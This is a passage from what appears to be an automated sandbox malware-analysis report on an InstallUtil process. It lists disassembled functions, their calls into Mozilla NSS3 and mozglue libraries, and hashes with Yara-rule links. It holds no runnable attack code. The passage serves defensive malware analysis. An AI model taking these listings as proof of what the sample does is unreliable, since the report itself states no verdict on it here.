                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 754562246-0
                                                                                                                  • Opcode ID: a819d11c0dc727a276d34b3a56492812398fc825b13f4520198e006b124dfc46
                                                                                                                  • Instruction ID: d93ab5b2bd318b86da73a8a482b2cfb9c6b09c95613613891685c0e475abeb72
                                                                                                                  • Opcode Fuzzy Hash: a819d11c0dc727a276d34b3a56492812398fc825b13f4520198e006b124dfc46
                                                                                                                  • Instruction Fuzzy Hash: 6B01D167B0411857FB21A16CAE8FAAF315C8B8766CB081032E809D7B01F692C90943F3
                                                                                                                  Function 6C86ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DeleteCriticalSection.KERNEL32(6C86A6D8), ref: 6C86AE0D
                                                                                                                  • free.MOZGLUE(?), ref: 6C86AE14
                                                                                                                  • DeleteCriticalSection.KERNEL32(6C86A6D8), ref: 6C86AE36
                                                                                                                  • free.MOZGLUE(?), ref: 6C86AE3D
                                                                                                                  • free.MOZGLUE(00000000,00000000,?,?,6C86A6D8), ref: 6C86AE47
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$CriticalDeleteSection
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 682657753-0
                                                                                                                  • Opcode ID: 6ba9a66ced54a0559403e80d1d8672276bf5f4329b331ef45368f59eb4532558
                                                                                                                  • Instruction ID: 5ad183729bbad7a624597ca8ee8912eba20c9aaf35e8f2904e89b5219dae8c07
                                                                                                                  • Opcode Fuzzy Hash: 6ba9a66ced54a0559403e80d1d8672276bf5f4329b331ef45368f59eb4532558
                                                                                                                  • Instruction Fuzzy Hash: 2EF0F6B5201A01A7CA209FE9E808A5BB7B8BF86778B100338E12A83941D733F012C7D1
                                                                                                                  Function 6C6E88D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,01DC7D83), ref: 6C6E8990
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: @zol
                                                                                                                  • API String ID: 2221118986-1163342012
                                                                                                                  • Opcode ID: 6aada34075b5745195e2fc368f6f77f551d2d6e1c441b675fede156b92f5d3c2
                                                                                                                  • Instruction ID: 05c3322f431e8d0e3c90db974c674f106a1749afd2d974393b1b623ad8b23083
                                                                                                                  • Opcode Fuzzy Hash: 6aada34075b5745195e2fc368f6f77f551d2d6e1c441b675fede156b92f5d3c2
                                                                                                                  • Instruction Fuzzy Hash: 57510571A097919FC704CF28C5946A6BBF0BF19308B24929EC8884BB13D331F596CBD5
                                                                                                                  Function 6C6E6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C6E6D36
                                                                                                                  Strings
                                                                                                                  • database corruption, xrefs: 6C6E6D2A
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6E6D20
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C6E6D2F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 632333372-598938438
                                                                                                                  • Opcode ID: 8afb3f75a9386eee32e7a17b1d6659ba39ab511d575fc65ce82a92fffcf993bf
                                                                                                                  • Instruction ID: 242160613bee05e699ab89617108388b14706c5d0d5d58e8d1dcf5679b1b4910
                                                                                                                  • Opcode Fuzzy Hash: 8afb3f75a9386eee32e7a17b1d6659ba39ab511d575fc65ce82a92fffcf993bf
                                                                                                                  • Instruction Fuzzy Hash: E02136306093089BC310CF1AC941B9AB7F2AF89318F54492ED9499BF51E3B0F949C79A
                                                                                                                  Function 6C7C2FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+|l,6C7C32C2,<+|l,00000000,00000000,?), ref: 6C7C2FDA
                                                                                                                    • Part of subcall function 6C7B14C0: TlsGetValue.KERNEL32 ref: 6C7B14E0
                                                                                                                    • Part of subcall function 6C7B14C0: EnterCriticalSection.KERNEL32 ref: 6C7B14F5
                                                                                                                    • Part of subcall function 6C7B14C0: PR_Unlock.NSS3 ref: 6C7B150D
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C7C300B
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C7C302A
                                                                                                                    • Part of subcall function 6C7B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B08B4
                                                                                                                    • Part of subcall function 6C79C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C79C45D
                                                                                                                    • Part of subcall function 6C79C3D0: TlsGetValue.KERNEL32 ref: 6C79C494
                                                                                                                    • Part of subcall function 6C79C3D0: EnterCriticalSection.KERNEL32(?), ref: 6C79C4A9
                                                                                                                    • Part of subcall function 6C79C3D0: PR_Unlock.NSS3(?), ref: 6C79C4F4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
                                                                                                                  • String ID: <+|l
                                                                                                                  • API String ID: 2538134263-1747921549
                                                                                                                  • Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                  • Instruction ID: 0a5f4b86c51bc663338dbddd6b8bb3adfd9d58f4ec928ebdca776a8a1b07db96
                                                                                                                  • Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
                                                                                                                  • Instruction Fuzzy Hash: 8E11E3B7B005056BDB008E65EE08ADB77DAAB84368F184134EC1CD7780E772ED55CBA2
                                                                                                                  Function 6C81CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C81CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C81CC7B), ref: 6C81CD7A
                                                                                                                    • Part of subcall function 6C81CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C81CD8E
                                                                                                                    • Part of subcall function 6C81CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C81CDA5
                                                                                                                    • Part of subcall function 6C81CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C81CDB8
                                                                                                                  • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C81CCB5
                                                                                                                  • memcpy.VCRUNTIME140(6C8B14F4,6C8B02AC,00000090), ref: 6C81CCD3
                                                                                                                  • memcpy.VCRUNTIME140(6C8B1588,6C8B02AC,00000090), ref: 6C81CD2B
                                                                                                                    • Part of subcall function 6C739AC0: socket.WSOCK32(?,00000017,6C7399BE), ref: 6C739AE6
                                                                                                                    • Part of subcall function 6C739AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C7399BE), ref: 6C739AFC
                                                                                                                    • Part of subcall function 6C740590: closesocket.WSOCK32(6C739A8F,?,?,6C739A8F,00000000), ref: 6C740597
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                  • String ID: Ipv6_to_Ipv4 layer
                                                                                                                  • API String ID: 1231378898-412307543
                                                                                                                  • Opcode ID: f29faf53d0391d1cfb146e10dc1a814d98c0e91d32130d107d5e14f963f17832
                                                                                                                  • Instruction ID: 055a0b5fdd572f4c7e596b655d5c1b51d3af94640f4f752007b083d090fa90ce
                                                                                                                  • Opcode Fuzzy Hash: f29faf53d0391d1cfb146e10dc1a814d98c0e91d32130d107d5e14f963f17832
                                                                                                                  • Instruction Fuzzy Hash: E11172F1B042405EDB309F5A9B46B867BA9934631CF501839E40ADFF42E771D808CBD9
                                                                                                                  Function 6C6DA8E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C80A480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C82C3A2,?,?,00000000,00000000), ref: 6C80A528
                                                                                                                    • Part of subcall function 6C80A480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C80A6E0
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6DA94F
                                                                                                                  Strings
                                                                                                                  • database corruption, xrefs: 6C6DA943
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6DA939
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C6DA948
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 491875419-598938438
                                                                                                                  • Opcode ID: 2264b9a99310d5b82510fd13bad7278974af581437ece1a243be4d3374061910
                                                                                                                  • Instruction ID: b3bd3a23656dfbe4d9ca09268221d3402f46a38efcfb57df9d24948e6110b79d
                                                                                                                  • Opcode Fuzzy Hash: 2264b9a99310d5b82510fd13bad7278974af581437ece1a243be4d3374061910
                                                                                                                  • Instruction Fuzzy Hash: D8012631B04208ABC7208A6ADD05BABB3F5AB88318F864839E94D5BB41D731B8088795
                                                                                                                  Function 6C768850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C770715), ref: 6C768859
                                                                                                                  • PR_NewLock.NSS3 ref: 6C768874
                                                                                                                    • Part of subcall function 6C8198D0: calloc.MOZGLUE(00000001,00000084,6C740936,00000001,?,6C74102C), ref: 6C8198E5
                                                                                                                  • PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C76888D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: calloc$ArenaInitLockPool
                                                                                                                  • String ID: NSS
                                                                                                                  • API String ID: 2230817933-3870390017
                                                                                                                  • Opcode ID: 765c39a543a2965b3ed9f7a2ab1e751a2998030d7310c471cbf93ed19e7640c0
                                                                                                                  • Instruction ID: 8db3e07afabd6b52cec2f96cc1e1f14b13b652834d911b632409df993460d8c7
                                                                                                                  • Opcode Fuzzy Hash: 765c39a543a2965b3ed9f7a2ab1e751a2998030d7310c471cbf93ed19e7640c0
                                                                                                                  • Instruction Fuzzy Hash: 76F096A6E8562123F610266B6E0EB8665985F5275DF040031ED0CA7F82EA52A51883E3
                                                                                                                  Function 6C7FA890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_FreeSymKey.NSS3(?,00000000,?,6C7E5F25,?,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FA8A3
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE10
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE24
                                                                                                                    • Part of subcall function 6C79ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C77D079,00000000,00000001), ref: 6C79AE5A
                                                                                                                    • Part of subcall function 6C79ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE6F
                                                                                                                    • Part of subcall function 6C79ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE7F
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEB1
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEC9
                                                                                                                  • PK11_FreeSymKey.NSS3(?,00000000,?,6C7E5F25,?,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FA8BA
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(%_~l,00000000,00000000,?,6C7E5F25,?,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FA8CF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterFreeK11_SectionValue$Item_UnlockUtilZfreefreememset
                                                                                                                  • String ID: %_~l
                                                                                                                  • API String ID: 2877228265-619745430
                                                                                                                  • Opcode ID: c5ac30c7727c7486c86e8a20726f1a5509ca8ab46be1790917c847114ceb7e3c
                                                                                                                  • Instruction ID: 4e49d393dbcb62fa462b8e94d7436ea5ea6731f61b8f16d4378c03cecaec4279
                                                                                                                  • Opcode Fuzzy Hash: c5ac30c7727c7486c86e8a20726f1a5509ca8ab46be1790917c847114ceb7e3c
                                                                                                                  • Instruction Fuzzy Hash: 52F0A0B2E01B1857EA119A56F849B9773A8AB0066DF048034D82A97B01E361F80687E1
                                                                                                                  Function 6C868530 Relevance: 6.1, APIs: 4, Instructions: 127threadnetworkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_CallOnce.NSS3(6C8B14E4,6C81CC70), ref: 6C868569
                                                                                                                  • gethostbyaddr.WSOCK32(?,00000004,00000002), ref: 6C8685AD
                                                                                                                  • GetLastError.KERNEL32(?,00000004,00000002), ref: 6C8685B6
                                                                                                                  • PR_GetCurrentThread.NSS3(?,00000004,00000002), ref: 6C8685C6
                                                                                                                    • Part of subcall function 6C740F00: PR_GetPageSize.NSS3(6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F1B
                                                                                                                    • Part of subcall function 6C740F00: PR_NewLogModule.NSS3(clock,6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F25
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallCurrentErrorLastModuleOncePageSizeThreadgethostbyaddr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4254312643-0
                                                                                                                  • Opcode ID: f2bea97c01fa8a4b8b4a1947872ff7bc3a2857890c2453c82838e0ee08e602ce
                                                                                                                  • Instruction ID: f2f4f296ff15a66d459bb589553e66ad1dd302a5c4a0309fb2272958ce690c71
                                                                                                                  • Opcode Fuzzy Hash: f2bea97c01fa8a4b8b4a1947872ff7bc3a2857890c2453c82838e0ee08e602ce
                                                                                                                  • Instruction Fuzzy Hash: E741B2B0A08346ABE7348B27CA48355B7B5AB4632CF084B2BC91D57EC1D7749D94CBD1
                                                                                                                  Function 6C814FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C6F85D2,00000000,?,?), ref: 6C814FFD
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C81500C
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8150C8
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8150D6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _byteswap_ulong
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4101233201-0
                                                                                                                  • Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                  • Instruction ID: 2e70fc4cc22d51b48406b513d5cebd329efac758878286c6bf99f201e0553a3d
                                                                                                                  • Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                  • Instruction Fuzzy Hash: 43416DB2A002158FCB28CF58DCD179AB7E1BF4431871D4A6DD84ACBB02E375E891CB81
                                                                                                                  Function 6C7A0420 Relevance: 6.1, APIs: 4, Instructions: 117memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
